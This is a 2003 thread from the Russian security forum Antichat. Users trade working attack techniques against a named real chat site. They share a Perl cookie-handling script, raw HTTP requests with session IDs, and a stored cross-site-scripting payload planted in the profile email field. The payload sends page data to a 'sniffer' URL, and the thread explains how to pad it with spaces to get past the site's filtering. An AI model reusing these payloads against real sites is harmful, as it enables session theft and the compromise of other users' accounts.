ANTICHAT — форум по информационной безопасности, OSINT и технологиям

InetCrack поддерживает отправку кукисов.
А не получается зарегить еще одного пользователя вероятно из-за того, что ты используешь старый номер сессии, с которого уже была произведена регистрация. А для новой регистрации нужно сначала получить новый номер сессии.

(да и кстати этот чат ломается через мыло в инфе юзеров)

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ апреля 25 2003,23:39)</td></tr><tr><td id="QUOTE">InetCrack поддерживает отправку кукисов

(да и кстати этот чат ломается через мыло в инфе юзеров)[/QUOTE]<span id='postcolor'>
спасибо за оперативность ) очень рад, что здесь такие гостеприимные админы )

Можно про мыло в мыло mailsks@rambler.ru поподробнее.

Номер сесии я указвал новый после первого запроса
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">GET http://chat.chatterbox.ru/people/form HTTP/1.0
Accept: */*
Accept-Language: ru
Cookie: hotlog=1; b=b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: chat.chatterbox.ru
Proxy-Connection: Keep-Alive
[/QUOTE]<span id='postcolor'>
пришел куке
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">
Set-Cookie: PHPSESSID=839c0f351709dda12a49e10f15a8bff2; path=/
[/QUOTE]<span id='postcolor'>
Именно его я указал в последующем

Кстати. На поминание о забытом пароле по майл - отключено (видимо в настройках)

У меня кук по этому запросу (GET http://chat.chatterbox.ru/people/form HTTP/1.0) не устанавливается. Он устанавливается где-то ранее.
В любом случае, как говорил мой знакомый, идеализма не бывает Если что-то не получается, значит неправильно делаешь.
Сравнивай запросы браузера и запросы инетКрека.Ищи различия.
Возможно чат требует что бы были пройдены все странички заполнения инфы, а не только последняя (которую ты и пытаешся запостить, я так понимаю)

Касаемо взлома через мыло - посмотри на мою инфу в чате (на ник Algol) и сам все увидишь &nbsp;

С мылом всё понятно, вопрос можно ли отправить на страниуку со снифером?

Без проблем ...
собственно даже отправлять никуда не нужно, просто
пишешь background:url(document.all[28].innreText)
А в соответствующем поле указываешь адрес картинки снифера.
Ну конечно можно еще поизвращаться что бы скрыть левые надписи в инфе, но это уже тонкости.

Прости за ламерство, но потратил пол дня на прочтение инфы. Видно подставлять в поле Mail нужно видоизмененную строчку
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">``style=`background:url(javascript: navigate(document.all[28].innerText));`[/QUOTE]<span id='postcolor'>
так как прямое копирование не помогло (

Получил таки куку с этой странички. помог метод ignore_discard: - сохранять даже файлы cookie, которые должны быть уничтожены (логический параметр)
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">use LWP::UserAgent;
use HTTP::Cookies;
$ua = LWP::UserAgent-&gt;new;
$ua-&gt;cookie_jar(HTTP::Cookies-&gt;new(file =&gt; &quot;lwpcookies.txt&quot;, autosave =&gt; 1, ignore_discard =&gt; 1));
$ua-&gt;agent(&quot;Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)&quot;
$ua-&gt;proxy(['http', 'ftp'] =&gt; 'http://161.53.73.251:80/&#39;
$req = HTTP::Request-&gt;new('GET',&quot;http://chat.chatterbox.ru/people/form&quot;);
$res = $ua-&gt;request($req);
print $res-&gt;content if $res-&gt;is_success;[/QUOTE]<span id='postcolor'>

Получена сесия ИД:
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">#LWP-Cookies-1.0
Set-Cookie3: PHPSESSID=3852bde9e0061a3f2e121da9fc44a9d0; path=&quot;/&quot;; domain=&quot;chat.chatterbox.ru&quot;; path_spec; discard; version=0[/QUOTE]<span id='postcolor'>

Эта зараза сразу отправляет второй запрос и тут же удаляет кук
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">GET http://chat.chatterbox.ru/people/css.php HTTP/1.0
Accept: */*
Referer: http://chat.chatterbox.ru/people/form
Accept-Language: ru
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)
Host: chat.chatterbox.ru
Cookie: PHPSESSID=3852bde9e0061a3f2e121da9fc44a9d0[/QUOTE]<span id='postcolor'>

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (1234567 @ апреля 26 2003,12:10)</td></tr><tr><td id="QUOTE">Прости за ламерство, но потратил пол дня на прочтение инфы. Видно подставлять в поле Mail нужно видоизмененную строчку
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">``style=`background:url(javascript: navigate(document.all[28].innerText));`[/QUOTE]<span id='postcolor'>
так как прямое копирование не помогло ([/QUOTE]<span id='postcolor'>
Прямое копирование не помогло, поскольку я забыл сказать об одной тонкости (вернее я думал ты сам ее заметишь):
Г-н автор чата видимо тоже не полный ламер, и наверно седьмым чувством почувстовал что в поле email-а содержится опсаность, и потому, если строчка длинная, вставляет туда один пробел, разбивая строку и нарушая таким образом синтаксис жабаскрипта. А может это просто глюк чата.
В любом случае нужно писать скрипт так, что бы этот пробел вставился в такое место, где он не нарушит синтаксис. Поэтому в моем примере между словом javascript: и словом naviagte должно быть ровно 6 пробелов. Тогда чат вставит еще свой 7-й пробел прямо перед словом navigate и синтаскис останется верным ))).